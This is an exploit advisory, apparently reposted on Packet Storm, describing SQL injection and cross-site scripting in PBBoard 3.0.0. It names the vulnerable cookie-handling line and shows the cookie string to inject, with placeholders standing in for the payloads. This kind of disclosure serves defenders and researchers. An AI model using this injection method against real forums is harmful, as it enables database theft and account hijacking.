PBBoard version 3.0.0 suffers from cross site scripting and remote SQL injection vulnerabilities.
6a8e16b78aad7c01d7d1e7ad57678ec6b2579e91772fb38f8d32343eeb830165#################################################
### Exploit Title: PBBoard v3.0.0 Multiple Remote Vulnerabilities
### Date: 12/10/2012
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.pbboard.com/
### Software Link: http://www.pbboard.com/PBBoard_v3.0.0.zip
### Version: 3.0.0 ( may be old version is affect ! i don't check )
### Tested on: Linux/Windows
#################################################
1- Remote SQL Injection :
In file ( engine/Engine.class.php ) on line 431 :
$username = $_COOKIE["PowerBB_username"];
# Inject the cookie by :
PowerBB_today_date=12%2F10%2F2012; PowerBB_username=[SQL]; PowerBB_style=1;
2- XSS :
In file ( engine/Engine.class.php ) on line 431 :
$username = $_COOKIE["PowerBB_username"];
# Inject the cookie by :
PowerBB_today_date=12%2F10%2F2012; PowerBB_username=[XSS]; PowerBB_style=1;
################################################
# Greetz to my friendz
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed